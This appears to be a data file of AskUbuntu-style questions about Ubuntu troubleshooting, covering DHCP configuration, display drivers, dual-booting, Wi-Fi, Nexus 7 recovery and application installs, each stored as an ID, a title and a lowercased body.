374636	dhcp for multiple subnetworks with one nic	i am trying to run dhcp server on ubuntu 12.04 . i need to configure several pools ( different sub-networks ) using one interface card . so i have configured below : sudo nano /etc/network/interfaces auto eth0 iface eth0 inet static address 192.168.2.2 netmask 255.255.255.0 broadcast 192.168.2.255 gateway 192.168.2.1 dns-nameserver 192.168.2.1 dns-search juniperlab.info sudo nano /etc/default/isc-dhcp-server interfaces= '' eth0 '' sudo nano /etc/dhcp/dhcpd.conf ddns-update-style interim ; option domain-name `` juniperlab.info '' ; option domain-name-servers juniperlab.info ; default-lease-time 600 ; max-lease-time 7200 ; authoritative ; log-facility local7 ; shared-network server { subnet 192.168.2.0 netmask 255.255.255.0 { range 192.168.2.10 192.168.2.100 ; default-lease-time 600 ; max-lease-time 7200 ; option routers 192.168.2.1 ; option broadcast-address 192.168.2.255 ; option subnet-mask 255.255.255.0 ; option ntp-servers 192.168.2.2 ; option domain-name-servers 192.168.2.2 ; } subnet 192.168.1.0 netmask 255.255.255.0 { range 192.168.1.10 192.168.1.100 ; default-lease-time 600 ; max-lease-time 7200 ; option routers 192.168.1.2 ; option broadcast-address 192.168.1.255 ; option subnet-mask 255.255.255.0 ; option ntp-servers 192.168.1.2 ; option domain-name-servers 192.168.1.2 ; } subnet 192.168.5.0 netmask 255.255.255.0 { range 192.168.5.10 192.168.5.100 ; default-lease-time 600 ; max-lease-time 7200 ; option routers 192.168.5.2 ; option broadcast-address 192.168.5.255 ; option subnet-mask 255.255.255.0 ; option ntp-servers 192.168.5.2 ; option domain-name-servers 192.168.5.2 ; } } after all configurations - dhcp service is functional but it gives me only 192.168.1.0 subnet ip addresses ca n't understand what i do wrong , if any ideas please help .
374637	ubuntu 12.04 - on first boot lightdm resolves hostname as `` localhost ''	this is my situation : configured sssd to auth against ad . ( this is working great ) desktop uses dhcp , also ddns is configured at the server side . deleted the /etc/hostname file - need the hostname to be obtained from the dhcp / dns server for reverse lookups . reboot desktop , lightdm starts and `` top left '' hostname = localhost . login with ad user - lightdm attempts authentication , lightdm reloads shows login screen again . now - `` top left '' hostname = dhcp / dns reverse-lookup hostname ! enter user name again and login is successful . some tests : reboot system . lightdm reports `` top left '' hostname = localhost . ctrl+alt+f1 prompt - localhost login $ ( same here as in unity ) ... login with ad user , success , `` sudo service lightdm restart '' lightdm loads , `` top left '' hostname = dhcp / dns assigned name ! login with ad user first time success . question : how can i get unity to obtain the ddns hostname at boot so that logins will work . i suspect that sssd attempts to verify desktop with reverse-lookup and fails at first attempt . thanks in advance .
374638	wallpaper wo n't stay	i 'm a new lubuntu user ( lxle to be precise ) . i want to know why does n't my wallpaper stay after a reboot ? any help is appreciated .
374640	how can i add delete option to the drop down menu ?	when i right click on a file or folder in ubuntu 13.10 i only have the option to send it to the trash . i would like to be able to delete it instead . how can i add delete to my choices ? i have searched and found quite a few replies but only found some obscure methods to delete files . i have not found out how to add this to the menu . i would like to just be able to right click and choose `` delete ''
374643	how to specify the order of startup scripts ( cli ) ?	startup really confuses me . it seems various methods for starting things happen in different locations all over the place . but is there a way to define the order they are loaded ? specifically ... i have an issue where plex media server ( pms ) ca n't be discovered by clients if the server 's vpn connection is established prior pms starting . it was driving me nuts , but i discovered that i could solve the problem by shutting down pms , shutting down the vpn , turning on pms and then turning on vpn . i 'm not exactly sure how pms auto-loads itself at startup , but the vpn is something i defined by editing : /etc/network/if-up.d/slickvpn with the following : # ! /bin/bash required_connection_name= '' wired connection 1 '' vpn_connection_name= '' myvpn '' activ_con= $ ( nmcli con status | grep `` $ { required_connection_name } '' ) activ_vpn= $ ( nmcli con status | grep `` $ { vpn_connection_name } '' ) if [ `` $ { activ_con } '' -a ! `` $ { activ_vpn } '' ] ; then nmcli con up id `` $ { vpn_connection_name } '' fi that 's a script i found somewhere ( i think on this site ) when looking for help autoconnecting a vpn . so i guess /etc/network/if-up.d/ scripts are initiated prior to the pms service . how can i flip that ? or other solution ?
374644	how to install visual python ?	i 'm a linux newbie but i 'm determined to get my favorite applications on my laptop running ubuntu 12.04 . i just installed cinnamon . i 'm trying to install visual python and it requires python 2.7 . i followed the instructions on the vpython site but the wine application is n't extracting anything from the python .msi file . from the first line wine start /i python-2.7.5.amd64.msi /qn targetdir=~/python27 allusers=1 it says fixme : storage : create_storagefile storage share mode not implemented . i created that python27 directory so i know it exists and it 's empty . i know ubuntu already has python 2.7 so i just tried running the vpython.exe file but it says `` this program can only be installed on versions of windows designed for the following processor architectures : x64 . '' my toshiba satellite has a 64-bit processor . could anybody help ?
374645	removing ubuntu from a laptop ( corrupted ubuntu )	i wanted to update my ( very old ) ubuntu installation on my dual boot laptop . the other os is win7 . however , when i tried to boot into it i got : \ubuntu\winboot\wubildr.mbr can not be loaded . status 0xe0000000c . i assume the mbr is the master boot record for the ubuntu installation . i looked at my c : drive and there 's a wubildr and wubildr.mbr file there . is it as simple as deleting them ? also , i just noticed there is no ubuntu partition . if i delete these files and then get rid of the startup option for ubuntu , is that all i have to do ? ( my goal is to have an up-to-date ubuntu os alongside win 7 ) .
374646	unable to install guard	i 've seen guard and it 's usefulness in web development and would like to install it . naturally , i expected to be able to use sudo gem install guard to do so ( yes , it is a ruby gem ) . however the installation errors out . here is what i 'm getting : building native extensions . this could take a while ... error : error installing guard : error : failed to build gem native extension . /usr/bin/ruby1.9.1 extconf.rb /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36 : in `require ' : can not load such file -- mkmf ( loaderror ) from /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36 : in `require' from extconf.rb:4 : in ` < main > ' gem files will remain installed in /var/lib/gems/1.9.1/gems/ffi-1.9.3 for inspection . results logged to /var/lib/gems/1.9.1/gems/ffi-1.9.3/ext/ffi_c/gem_make.out does anyone know how i can fix this ? thanks for any help .
374648	how do i migrate google chrome bookmarks from xp to ubuntu ?	i 've just swtiched from xp to ubuntu . i 've installed google chrome to ubuntu . i have my xp chrome folder on an external hard drive including the bookmarks file . i was thinking i could just go to the ubuntu equivalent of 'program files ' and switch in my xp chrome bookmarks folder for the ubuntu default one , but i have had no luck in finding such a place as 'program files ' in ubuntu . 1 . where is the ubuntu equivalent to windows xp 's 'program files ' ? 2 . how do i migrate google chrome bookmarks from xp to ubuntu ? thanks .
374649	can only search social network messages in the dash after 13.10 upgrade	after upgrading to ubuntu 13.10 , when i click on the dash icon i can only see social media search results . i ca n't type in applications or see a list of applications to launch .
374650	dell studio 1457 black screen on resume 13.10	this is my first post here . my dell studio 1457 's a great laptop and has been with me through thick and thin , but it has always had problems with the open source radeon driver . as fglrx is being left behind ( amd not helping by no longer updating the proprietary driver ) with the move into 13.10 , i 'm finding myself with a laptop that will still not resume from suspend with the radeon driver . the computer suspends successfully , but every time i resume the computer turns on , but i get a black screen with no led backlight . again , this has always been a problem for me , since the 11.10 days . my graphics card is an hd mobility radeon 4530 . i 'm running ubuntu gnome 13.10 . adding nomodeset as a kernel argument in /etc/default/grub does permit resume from suspend , but by doing that i miss out on excellent features of the new radeon driver in combination with the 3.11 kernel ( radeon.dpm -- which is wonderful power management finally ) and hdmi video out to external monitor ( nomodeset leads to neither hdmi out nor vga out being recognized in displays . ) i really do n't want to give up on these features as i use an external monitor extensively , and it 's so exciting seeing the open source driver working so flawlessly in these two areas . i 've tried pm-suspend quirks listed on the ubuntu manpage : -- quirk-radeon-off , -- quirk-vbe-post , -- quirk-vbemode-restore , -- quirk-vbestate-restore , and -- quirk-vga-mode3 , to no avail . it always successfully suspends but resumes to black screen . i 've also tried the tuxonice kernel , first installing it , then setting pm-suspend to use tuxonice backend with cat `` sleep_module=tuxonice '' > /etc/pm/config.d/sleep_module following that with a kernel arg addition in grub_cmdline_linux_default of `` resume=swap : /dev/sda2 '' ( and i do have that swap partition . ) tuxonice , in a nutshell , did n't work either . so as this laptop 's both getting old ( 2009 ) and relatively far from the mainstream , i 'm wondering if there 's any way i 've yet to try that i might get resume working properly under the radeon driver without nomodesetting it . i fear it may be this laptop 's crap bios , but i am open to suggestions .
374651	ubuntu touch on innotab3 ?	the title pretty much says it all . i 'm a mobotix amp and am looking for an affordable intercom touchscreen for my clients . the free mobotix software runs on ubuntu , which should then provide two way voice to and from the camera . i 'm kinda a noob on linux , most forum instructions read like swahili to me , although i have ubuntu installed on one of my home towers and love it . if only wine would support all the billyware programs i need . i 'm sure that is coming : ) cheers heinz www.keepsafesystems.ca as a bonus , if anyone is willing and able , i do have an open source project , of sorts , in its infancy at www.loxone.org ( for some reason some austrians are mad at me for that ) anyways , the goal is to create a home automation universal interface bridge type dongle to integrate multie technologies by acting as a message translator of sorts . more on the site
374657	two grub screens on startup	i installed ubuntu 12.04 on another partion of same disk . so i have windows 7 ( initially installed ) and ubuntu ( installed after windows ) . the thing is i could n't access ubuntu after installation , so i used easybcd and edit grub file of windows and added ubuntu like this ; and initial grub list became like this , now the problem is whenever i started the computer if i select ubuntu from windows 's grub it asks again within ubuntu 's grub . thats quite annoying : ) . how can handle with this issue . i will appreciate for any help . well thanks anyway .
374659	standalone install of ubuntu 13.10 csm	well i currently have a samsung series 3 ( 355v4c/356v4c/344v4c/355v4c ) that came with windows 8 already installed on the system . would it be possible and error-free to install ubuntu 13.10 on this laptop if i have `` fast boot '' , and `` secure boot '' set to disabled and then select csm . is this possible without any errors ? i plan to completely get rid of windows 8 and just use ubuntu 13.10 .
374660	no internet access ( fresh install 12.04 ) help	hi i just installed a fresh download of ubuntu and when i connect to my wireless everything is fine but when i try to go out on internet i cant , please help me with this problem dont know what to do : ( what commands do you need output of ? ( so i can connect to my wireless but i have no internet access ) my problem is that i cant have internet access but i can connect to my wireless wireless-info.txt : http : //pastebin.com/qkqazm50
374664	ubuntu 13.10 security key	i was attempting to install ubuntu 13.10 today and it came up with a screen asking for me to setup a security key . in the first place , i 'm not sure what a security key is , but it said i would have to enter it everytime i booted ubuntu so i assume it 's the same thing as a logon password in windows 8 . is there anyway i can bypass this step without setting up a security key or logon password ? i hate these things and have always avoided them in windows . i do n't need them as there is never anyone but myself and my wife on our computers . we are retired , no children or nieces , nephews , friends , etc . who ever use our computer and we do n't have any security information such as ss # , etc . on it . also , i quit the installation at this point but i was not seeing any of the screen prompts as listed in the setup instructions on the ubuntu website . has the setup for ubuntu 13.10 changed since these instructions were written ? thanks
374667	virtual machine isnt working ?	i have multiple iso 's i have tried . ( windows 7 ) but yet it keeps coming up with a fatal error . no medium or such . i was wondering why , yes i am assuming my laptop has virtual machine capabilities . ( asus k55a ds71 ) . any help ? : /
374668	changing wifi card in hp laptop	i have a friend who has an hp laptop , that was running windows 7 , but decided to install 13.04 . the problem is his wifi has a very weak signal and is only getting about a 1.5k speed when his connection is a 2mbps . is it possible to change out the wifi card with a known linux-friendly card , and what would i need to do if this is possible to have it recognized by ubuntu ?
374669	runescape - ubuntu 12.04 - jaggex cache folder	does anyone here know how to hide the jaggexcache folder , jagexappletviewer file and jagex_cl_runescape_live file from the home folder ? the problem is this , everytime you play runescape ( in both windows or linux ) , it creates those files and folders . the problem is that on windows , you can hide them and everything is fine . on linux , if you add ( / . ) to the folder or file to hide it , when you play runescape , those files and folders are again created , because they can not be found . as far as i know , the game is java based ( needs java iced tea plug in and java 7 ) , so is there any way of changing the directory where the game puts all those files ? like home/documents instead of just /home thanks !
374671	ubuntu 13.10 . after login , no desktop displayed . two nvidia graphics cards , four monitors	i am working on an issue with my ubuntu 13.10 installation . i am attempting to get 4 monitors up and running but i am having some trouble . so far , i installed and updated to the latest nvidia drivers ( 331.20 ) . initially x would not start ( after installation ) so i replaced my xorg.conf with xorg.conf.failsafe . this fixed that problem , but then i tried to enable the other 2 monitors ( other video card ) and xorg fails to start once again ( after i login there is no desktop ) . i am fairly new to linux but i am not a complete beginner , but i 'm not comfortable poking around too much on my own to troubleshoot yet ... . lspci -nn | grep vga : 03:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf110 [ geforce gtx 570 rev . 2 ] [ 10de:1086 ] ( rev a1 ) 05:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf110 [ geforce gtx 580 ] [ 10de:1080 ] ( rev a1 ) it seems that the nvidia-settings tool does not result in a good xorg.conf file . here it is : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 331.20 ( buildmeister @ swio-display-x86-rhel47-05 ) wed oct 30 18:20:32 pdt 2013 section `` serverlayout '' identifier `` default layout '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 1 '' endsection ... section `` monitor '' identifier `` configured monitor '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` sharp hdmi '' horizsync 15.0 - 68.0 vertrefresh 55.0 - 76.0 endsection section `` monitor '' identifier `` monitor1 '' vendorname `` unknown '' modelname `` samsung syncmaster '' horizsync 0.0 - 0.0 vertrefresh 0.0 endsection section `` device '' identifier `` configured video device '' driver `` vesa '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 570 '' busid `` pci:3:0:0 '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 580 '' busid `` pci:5:0:0 '' endsection section `` screen '' identifier `` default screen '' device `` configured video device '' monitor `` configured monitor '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-1 '' option `` metamodes '' `` hdmi-0 : nvidia-auto-select +640+0 , dvi-i-3 : nvidia-auto-select +0+1080 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` metamodes '' `` dvi-i-2 : nvidia-auto-select +0+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection section `` extensions '' option `` composite '' `` disable '' endsection
374672	ubuntu 13.04 upgrade to 64 bit	i have ubuntu 13.04 dual booting wit ms windows . it is a 32 bit version but the pc is a 64 bit . when i use the 64 bit install dvd it sees the two main partitions and gives several options but i ca n't find how to replace the ubuntu 32 with the 64 version without chopping the hard drive into little pieces or formatting the whole drive . i do n't want to to do this and do n't recognise any of the partitions shown when i go to the `` do something else '' menu .
374673	downloading 12.04	i am running the installation right now and i have not seen an option to install in place of the window xp that is currently running on this computer . will i be given that option after the install ?
374674	menus , folders , programs are all hidden or invisible in ubuntu 12.10	i have had problems with this laptop aspire 4530 for the last 3 days . i erased the last ubuntu ( several times ) and all is the same : ubuntu starts , but in the screen there is not a menu ( in the left side ( using gnome desktop ) ) and i can not see any program , application , internet , graphic , games , nothing . i neither can see any folder . this is killing me for hours . any idea in how can i get those menus back ? thank in advance
374675	can i hook my xbox up to my ubuntu pc	my old xbox 360 wo n't eject disks , it makes a sound , but wo n't open . i want to play games , so i think i could hook it up to my pc running ubuntu 13.10 64-bit and maybe i could use my pc 's dvd drive . can this work at all , or am i just crazy ? there is an hdmi port on the back of my graphics card . if i ca n't do that , is there any software for ubuntu that can rip the game off of a cd and put it on a flash drive ? i have heard xbmcbuntu works great for gaming , but it does n't work with my pc .
374677	full brightness and keyboard backligh at boot	i own an asus n56vz , and each time i start ubuntu ( 13.10 and prior versions ) my screen brightness and keyboard backlights reset their values to the max . ubuntu does n't save my settings on reboot . i was wondering if someone could help me with this ? it is horrible when , at night , i turn on my computer - it is like looking directly to the sun , and it hurts my eyes . i tried googling and none of the pages i found actually helped . i think my issue might be grub-related . i have a dual-boot with windows 8.1 , so before i start my computer i see grub to choose my operating system . my screen starts at full brightness as soon as i reach grub . maybe he is making the os forget about my last values , overriding it with its ? does someone knows how to solve this ? thanks in advance : ) ps : i 'm using bumblebee with nvidia driver 304 , but this issue existed before i installed it .
374679	nexus 7 possibly bricked	i have a 1st gen nexus 7 ( 32gb ) . i used the steps here to successfully install ubuntu 13.04 desktop onto the tablet . it was working fine and then i decided to upgrade to ubuntu touch . i booted the tablet into fast boot mode but the commands adb devices and sudo fastboot devices would not see the device . i am performing these steps from an ubuntu 12.04 desktop pc . prior to installing 13.04 the device was seen fine . i made the mistake of performing the 'device factory reset ' step here - step 2 . now when i try to boot the device i get the following : mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /dev on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory targe filesystem does n't have requested /sbin/init . no init found . try passing init= bootarg . busybox v1.20.2 ( ubuntu 1:1.20.0-0ubuntu1 ) built-in shell ( ash ) enter help for a list of built-in commands . ( initramfs ) i have searched the web but every reference to this problem is from people who still have adb access to the device so they can recover by flashing the tablet again . i can attach a keyboard to the usb port and access the busybox console but i do n't know what steps to do to recover from my error . any suggestions would be helpful . thanks update : no combination of power and volume buttons could get into fastboot mode . however , once the tablet lost all power ( since i could not shut it down from busybox ) and i recharged it , the tablet came up in the fastboot mode . based on the one suggestion provided , i was able to connect using 'sudo fastboot devices ' instead of 'adb devices ' . i want to thanks both people that responded for their help . i would up vote the answer but being new to the forum i do not have enough reputation yet to do so . but thanks for the help .
374681	how to auto rebuild my module to new kernel ?	new to linux , after doing this : http : //ubuntuforums.org/showthread.php ? t=2092934 i got my wifi up and running , ignorantly , i clicked to update my computer and it came with a new kernel , but it killed my wifi . doing it over again is not a problem , but i would like it done automatically in future , dkms or something ? and also , where/how do i delete old kernels once i 'm not using them anymore ? .
374683	failed installing driver , black screen on login	ubuntu 13.10 i tried to install the 13.4 ccc driver from amd and it seems to have failed , i can login but then i get a black screen with a cursor , it does nothing how do i fix the driver from my install disk of 13.04 ? id rather not have to reinstall .
374689	how can i fix widows partition after ubuntu repair and recovery	i got 1234f : error code during boot due to broken stuff . i could recover the ubuntu system with the following commands ; sudo apt-get update sudo apt-get install -- reinstall ubuntu-desktop sudo apt-get install unity and then running startx and boot-repair with ctrl+alt+f2 . so now i have a perfect ubuntu startup , but my windows 7 partition still does n't work . what shall i do ?
374690	why wo n't skype start in 13.10 ?	i have installed skype using the software center but it wo n't start - nothing happens when i start it . i already reinstalled without success and i am running a fresh install of ubuntu 13.10 . and when i type skype into a terminal , i get : skype : error while loading shared libraries : libgl.so.1 : can not open shared object file : no such file or directory when i type dpkg -l skype in the terminal , i get this : desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-==============-============-============-================================= ii skype 4.2.0.11-1 i386 wherever you are , wherever they a adriaan @ adriaan-buijtendorp : ~ $
374693	multiple possible interpreters in a shebang ?	trying to learn me some nodejs , i installed npm and the learnyounode module . unfortunately , learnyounode tries to execute # ! /usr/bin/env node and not # ! /usr/bin/env nodejs -- as we have it setup in ubuntu . i 've been looking , but i ca n't seem to find a way to have a fallback shebang . i know users can always link /usr/bin/nodejs to /usr/bin/node , but it 'd be nice if there was a more elegant way to write runnable node scripts , regardless of if the interpreter was named node or nodejs .
374695	burn ubuntu to cd on windows , then boot on mac	is it possible to burn the ubuntu desktop disk image to a cd on windows , then use the live cd to boot on a mac ? i have a mac at work and a windows at my home , and it takes a very long time to download the ubuntu .iso at work . thanks
374698	how to use a program designed for older verisions of ubuntu on a newer one	i was wondering if there was a way to run a older program designed for a older version of ubuntu on a new one . specifically robot os fuerte which was designed to work on 12.04 on ubuntu 13.04
374705	ubuntu 13.10 display driver totally broken by nvidia driver	today i 've made the biggest mistake in my life : i tried to install a nvidia driver by running the .run file in a terminal . the driver setup asked me that there was a problem preventing the driver from being installed which could sometimes be solved by generating some kind of config file . i agreed and the config file was created , however immediately after that the installation terminated because of some other stuff i did not want to read anymore . i assumed that this little incident did not affect my well-running system , but at the next bootup , i saw that i 've been wrong . ubuntu booted into a low-resolution mode and was finally stuck on a black screen . so i rebooted in recovery mode , went into root terminal , gained write access to my drive and tried to sudo dpkg-reconfigure xserver-xorg , which terminated without displaying any message . i also tried to boot into low-graphics mode and start the graphics repair option which did nothing but showing me the option screen again and again . how can i reset my display driver to default post-installation settings ?
374710	qtcreator does n't let me create ubuntu touch apps !	i 've gone through the instructions for installing the sdk found here : http : //developer.ubuntu.com/apps/create/get-the-sdk/ using xubuntu 12.04 . everything went well except , for some reason , qtcreator wo n't let me create a qml ubuntu touch app ! while the ide looks like it 's ready to create ubuntu touch apps , when i click on 'create new project ' i do n't have an option in any of the project types to create a touch app . can anyone advise me as to what might be going wrong ? thanks !
374711	ca n't access cups	i 'm having some trouble accessing cups through my browser : localhost:631 results in nothing but a `` bad request '' here 's some output from /var/log/cups/error_log : failed to createprofile : org.freedesktop.dbus.error.noreplyid not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . and : request from `` 192.168.0.254 '' using invalid host : field `` localhost:631 '' does anyone know what i 'm doing wrong ? thanks , david
374712	sudo wipe command in terminal error	i did the command sudo wipe /dev/sdb where /dev/sdb is my 1tb hdd and i got a `` command not found '' message . how would i be able to prepare the drive for new os ? wipe it , i mean . thanks
374717	`` input/output error during write on /dev/sdb '' on install from bootdisk	i 'm rather new at this , and i have looked over other questions but have n't been able to find anything that helps . there is no os on my computer at this time , i 've adjusted the boot order in my bios , and i 'm trying to fully install . everything starts up , start the install , i 'm connected to the internet , install starts kind of . when they are 'detecting file systems ' and there is a map in the back ground so you can find your time zone , the error pops up . please help !
374723	lightdm crashes at seemingly random intervals	i installed ubuntu 12.04 lts around a month ago , and it 's a great experience . except for one thing : lightdm crashes at seemingly random times , on average 2 times on a normal working day . i have no idea why , and i do n't see a pattern . i 've obviously looked through askubuntu and other resources but ca n't seem to find a solution , or even a clue as to what might be wrong . details : when a crash occurs the screen freezes , but the mouse cursor still moves freely . i can move the mouse around , but i ca n't click on anything . i see no discernable pattern in user behaviour when a crash occurs . i often have vlc media player open , and almost always a browser . at first i thought it might be the browser , so i switched from chromium to firefox . the problem remained . so it is n't seemingly related to any one program . i can press ctrl-alt-f2 to bring up a commandline , then run sudo lightdm stop and sudo lightdm start . this kills lightdm and starts it again , but i lose everything i was working on at the time . ( this is also why i presume it 's lightdm that 's the problem - it might not be though ) here are some clues about the system i 'm running . hardware hardware is a lenovo t60 with 2gb ram . the battery is dead , so it only runs on mains i did a memory check of the ram , and it 's ok . the cd-drive does n't work dual screen setup with laptop monitor and an external 1920x1080 screen driven by the t60 's external screen output 3g internet . crashes happen both when i have the 3g usb dongle connected directly to the computer , and when i connect via wi-fi . the t60 is in a dock . external standard usb mouse and keyboard other clues installed programs ( on top of base installed programs ) : vlc , libre office , mysql , nginx , php-fm , firefox , blender , arduino ide , gnu emacs . i sometimes at random times see the laptop monitor ( never the external monitor ) blink for what looks like a frame or two . at startup i see `` tmp drive not mounted , would you like to wait '' which i do , and it keeps on booting ( not exact wording but pretty close ) there is no pattern as to when the screen freezes . no particular action seems to trigger it . i 'm fairly new to ubuntu and linux , so i 'm quite clueless as to what this might be . any ideas , and pointers would be much appreciated !
374724	wpa.conf setup for multiple networks	i asked this over on the rasppi forum but figured i 'd get a faster response if i posted it here as well . wifi setup for multiple networks - original post summary : i have a rasppi . going between home and school . need static ip for both networks . i know how to do it if its a single network using wpa.conf . how do i configure for more than one network and different ip ?
374725	installing ubuntu-13.10 on win7	i just want to make sure i do this right . i downloaded unetbootin-windows and also ubuntu-13.10-desktop iso . i ran unetbootin and chose usb and it seemed to create folders on my usb drive along with the wubi.exe . but now i 'm not sure what the next step is . i want a dual boot system . or to run ubuntu alongside windows . when i ran wubi was given the option to reboot now or later . what will this do ? ron
374728	python example for app indicator does not work	using ubuntu 13.10 , the python example for how to create an application-indicator does not work ... ( http : //developer.ubuntu.com/resources/technologies/application-indicators/ ) getting the following error : app-indicator.py:35 : warning : /build/buildd/glib2.0-2.38.1/./gobject/gsignal.c:2475 : signal 'child-added ' is invalid for instance '0x10dd0c0 ' of type 'gtkmenu' ind.set_menu ( menu )
374732	how do i install multitouch on the aspier 8930g ?	i would like to use two finger scrolling on my touchpad on acer aspire 8930g . is there a package , i can install with apt-get ? i tried to install synaptics-dkms from this ticket . but when i install that , i get the error : make kernelrelease=3.11.0-12-generic -c /lib/modules/3.11.0-12-generic/build subdirs=/var/lib/dkms/synaptics/1.1.0/build modules ... . ( bad exit status : 2 ) error ( dkms apport ) : binary package for synaptics : 1.1.0 not found error ! bad return status for module build on kernel : 3.11.0-12-generic ( x86_64 ) consult /var/lib/dkms/synaptics/1.1.0/build/make.log for more information . dpkg : fehler beim bearbeiten von synaptics-dkms ( -- install ) : unterprozess installiertes post-installation-skript gab den fehlerwert 10 zur端ck
374735	images shown with function keys actions	i installed ubuntu 13.10 today . i have a problem with the images shown when you press function keys for volume and brightness ( the ones that appear on the middle of your screen ) . the black background of these images disappeared so i ca n't see it when i have white colors behind ( just to try to up volume when you 're on google , you 'll see what i mean ) . does someone knows what i have to put on my css theme to show that black background again ? it appears when i switch to default theme .
374740	nexus 7 stuck on google screen ubuntu touch	i 'm trying to install ubuntu touch on my nexus 7 with these instructions . after the tablet rebooted , it got stuck on the google screen . the article says if the deploy fails ( example : boots to black screen ) , try wiping the/datapartition on your device and redeploy . i used clockworkmod recovery to wipe /data . when i ran phablet-flash ubuntu-system -- channel devel -- no-backup it said i did n't have the permissions to do this . i went into cwm and hit `` fix permissions '' and it did the same thing . when i run adb devices it returns : list of devices attached ? ? ? ? ? ? ? ? ? ? ? ? no permissions .
374741	i used 'apt-get install -f ' . now all my applications are gone and those i have reinstalled look wrong .	i used 'apt-get install -f ' when prompted by the updater . normally this should have fixed the problem , however in my case it seems to have damaged the system quite a lot . now all my applications are deleted permanently and those that i have reinstalled have odd guis . for example the software centre looks like the image below . this extends to the login screen and a multitude of other applications . is it possible that this happened because of an interrupted internet connection when updating , or something else ? is there a quick fix , or do i have to manually reinstall every application ?
374742	vlc playing vid over samba stuttering ?	this is sort of an open ended question , so any recommendations will be appreciated i have a ubuntu box as my main server and i stream video on my mac since i ca n't carry my server box upstairs this is my current configuration : my mac connects to my linux box via samba and basically mounts the shared folder as a network drive . i am using vlc player to play videos over this network drive and i find that the quality of the video is not as optimal as i would like it to be - seeking takes a good 10 seconds while i get the occasional stuttering ( green screen ) playing 540p videos , let alone 1080p . my current setup permits a 1.8 mb/s bandwidth ( tested with scp ) , so i do n't think network latency is that big an issue here . i have trouble tweaking vlc because i am not technically streaming videos in the vlc player - vlc has no idea i am playing over a lan network . hence , i am unable to set the stream buffer and cache values that are specific only to network streaming on vlc . is there anything i can do to improve my current set up ? will using a media streaming server help ( like amahi ) ? are there more efficient protocols than smb for this purpose ?
374745	asus vx-6 laptop wireless not connecting	someone posted a script a couple days ago , here is my output.pastebin i can see wifi ssids in network , but can not connect to mine . the only time wifi worked on 13.10 was in the live cd , but wifi stopped working as soon as install process started . did below but made no difference . sudo apt-get install bcmwl-kernel-source sudo modprobe -rv brcmsmac sudo modprobe -v wl what i do next ? i tried software & updates and it showed 1 proprietary driver in use . this sounds like a wpa/wpa2 issue ? wifi works when i tried zorin os 7.1 , wifi always worked in windows 7 .
374747	how to restore backup configurations of deja-dup	how can i restore backup configurations of deja-dup ? i formatted my ubutnu machine and i forget to copy the old configurations : (
374750	wireless connect- webcam activation- mbr repair/rebuild	my laptop is hp 2000-210us . i 've never had so much difficulty with ubuntu . i got `` ubuntu made easy '' and could n't believe it has n't done a damn thing to help solve the problems . since install of 12.04 i have n't been able to connect to wireless . have done everything i can find/think of . laptop indicates it 's receiving wireless . ran all updates , restricted extras , etc . that not solved . tried to find how to activate built-in webcam ( it worked when i installed o.s. ) . could n't activate . i tried to find mbr repair/rebuild terminal command . no results . the book has has been useless , so far . i really have to solve these problems , otherwise laptop and ubuntu are worthless . hope someone can help me out with any or all the problems i 've listed . sure would appreciate it !
374752	suspend not working	i am running 13.10 on an asus 101-se netbook . under `` power settings '' i have selected suspend when inactive for 10 minutes and suspend when lid is closed . i get a warning when inactive that the computer will suspend due to inactivity , but it does not suspend either from that condition or when closing the lid . i seem to be getting multiple suspend messages as i need to click `` cancel '' or `` ok '' many times to get the error window to close when it has been inactive for some time . anyone have any tips ? thank you .
374753	installer does n't recognise windows 7 install	i will start off saying i searched a bit for this problem with little success . you see , i am an utmost noob when it comes to ubuntu and linux based os ( hence why i want to install it and discover it ) and the thread i found were too specific for me to do anything with . therefore , if you find a thread that is noob-friendly and answers my question , please link it below or please try to answer as simply as possible : ) the problem : i want to install ubuntu 12.04 lts 64 bit alongside windows 7 on my main hard drive ( to get the choice which one to start when booting ) . pop the cd in , reboot and get to the installer screen . i know i 'm supposed to have 3 options , but i 'm only given the option to erase my hard drive or `` do something else '' . therefore , my question is : how do i make ubuntu recognise windows 7 , so it may install alongside it ?
374754	how to install oxford advanced learners ' 8 in ubuntu 12.04 lts 64bit	i have bought oxford advanced learners ' 8 which come along with installation cd . in the cd they have linux installation option . but i ca n't install that in my ubuntu . when i run setup.sh from my terminal i get the following error message : the setup program seems to have failed on amd64/unknown fatal error , no tech support email configured in this setup does anyone have idea about installing oald 8 in ubuntu x64 ?
